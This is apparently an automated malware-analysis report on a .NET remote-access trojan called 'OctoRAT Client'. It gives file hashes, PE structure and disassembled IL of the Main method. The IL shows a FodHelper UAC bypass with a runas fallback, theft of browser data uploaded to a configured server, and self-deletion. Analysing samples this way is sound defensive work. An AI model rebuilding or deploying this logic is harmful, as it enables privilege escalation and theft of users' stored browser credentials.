Suspicious
Suspect

e62d2b68f8730d6698305630fe4b7e5b

PE Executable
|
MD5: e62d2b68f8730d6698305630fe4b7e5b
|
Size: 350.72 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
e62d2b68f8730d6698305630fe4b7e5b
Sha1
c0b0d6ad612a347d1c4f0c1ad652069eb58c4a30
Sha256
77e14df7fb73b07b316c9b8d22af12cb2aec57c01fb6a861e9be3a7eba459892
Sha384
52792ef0e0dbd1ded7a75cc82177f7e483de828d85abe889d1fd3d37242a4003da0e41a5171e708646867bd362306355
Sha512
050a5c915c16f0c9ee01fdf6b4d0000d91b7255a9dfeb86c448d599c8e4fa3c93cd81c8f015ceb7d090eda9f0f821c9b5fbff9b4d873f289cd5aaa4126de8c98
SSDeep
6144:C1p9ZGm1+3rUQaksJeyqIpgvi/JS3JkkAPjG589bAIpX7NhQol:q8r340sJeo5S3dAPjwWbQol
TLSH
0F74085077F94500F1FF2F79A8B205214AB7B897AD39D70D098A949E1E73B81EC60B63
File Structure
e62d2b68f8730d6698305630fe4b7e5b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_RCDATA
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: C:\Users\sulum\OneDrive\Desktop\datacenter\server - Copy\stubCsharp\obj\Release\Client.pdb
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void Client.Program::Main(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8
Total Strings

2892
Main Method

System.Void Client.Program::Main(System.String[])
Main IL Instruction Count

175
Main IL

call System.Void BrowserDataExtractor.iamfine::EnsureBouncyCastleDLL() ldstr [{0:yyyy-MM-dd HH:mm:ss}] === RMM Client Starting === call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::IsRunningElevated() brtrue IL_0134: ldnull call System.String Client.ResourceReader::GetConfig() stloc.2 <null> ldc.i4.0 <null> stloc.3 <null> ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0061: ldloc.3 ldloc.2 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 124 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_4 ldloc.s V_4 ldlen <null> conv.i4 <null> ldc.i4.5 <null> blt.s IL_0061: ldloc.3 ldloc.s V_4 ldc.i4.4 <null> ldelem.ref <null> ldstr true call System.Boolean System.String::op_Equality(System.String,System.String) stloc.3 <null> ldloc.3 <null> brfalse IL_011B: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges" ldstr [{0:yyyy-MM-dd HH:mm:ss}] Not running as admin, attempting FodHelper UAC bypass... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::BypassUACFodHelper() brfalse.s IL_00AB: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas..." ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass successful, process will restart elevated call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldc.i4 3000 call System.Void System.Threading.Thread::Sleep(System.Int32) ret <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.s V_5 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldloc.s V_5 callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldstr runas callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave IL_0262: ret pop <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass failed, continuing without elevation call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0134: ldnull ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldnull <null> newobj System.Void BrowserDataExtractor.BrowserDataExtractor::.ctor(System.String) stloc.0 <null> ldloc.0 <null> callvirt System.Void BrowserDataExtractor.BrowserDataExtractor::Run() call System.String Client.ResourceReader::GetIP() stloc.s V_6 call System.String Client.ResourceReader::GetPort() stloc.s V_7 ldloc.s V_6 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0161: ldstr "127.0.0.1" ldloc.s V_7 call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_016F: ldloc.s V_7 ldstr 127.0.0.1 stloc.s V_6 ldstr 8080 stloc.s V_7 ldloc.s V_7 ldloca.s V_8 call System.Boolean System.Int32::TryParse(System.String,System.Int32&) brtrue.s IL_0181: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] Uploading browser data to {1}:{2}..." ldc.i4 8080 stloc.s V_8 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Uploading browser data to {1}:{2}... call System.DateTime System.DateTime::get_Now() box System.DateTime ldloc.s V_6 ldloc.s V_8 box System.Int32 call System.String System.String::Format(System.String,System.Object,System.Object,System.Object) call System.Void System.Console::WriteLine(System.String) ldloc.0 <null> ldloc.s V_6 ldloc.s V_8 callvirt System.Boolean BrowserDataExtractor.BrowserDataExtractor::UploadToServer(System.String,System.Int32) brfalse.s IL_01CA: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] Browser data upload failed!" ldstr [{0:yyyy-MM-dd HH:mm:ss}] Browser data uploaded successfully! call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) br.s IL_01E3: leave.s IL_0209 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Browser data upload failed! call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0209: ldc.i4.1 stloc.s V_9 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Error uploading browser data: {1} call System.DateTime System.DateTime::get_Now() box System.DateTime ldloc.s V_9 callvirt System.String System.Exception::get_Message() call System.String System.String::Format(System.String,System.Object,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0209: ldc.i4.1 ldc.i4.1 <null> ldstr OctoRAT_Client_Mutex_{B4E5F6A7-8C9D-0E1F-2A3B-4C5D6E7F8A9B} ldloca.s V_1 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.s V_10 ldloc.1 <null> brtrue.s IL_021D: nop leave.s IL_0262: ret nop <null> call System.Void Client.Program::Initialize() call System.Void Client.Program::Run() leave.s IL_0262: ret stloc.s V_11 ldstr Fatal error: ldloc.s V_11 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void Client.Program::WriteLog(System.String) leave.s IL_0262: ret call System.Void Client.Program::Cleanup() ldsfld System.Boolean Client.Program::meltEnabled brfalse.s IL_0255: endfinally call System.Void Client.Program::SelfDelete() endfinally <null> ldloc.s V_10 brfalse.s IL_0261: endfinally ldloc.s V_10 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null>
e62d2b68f8730d6698305630fe4b7e5b (350.72 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙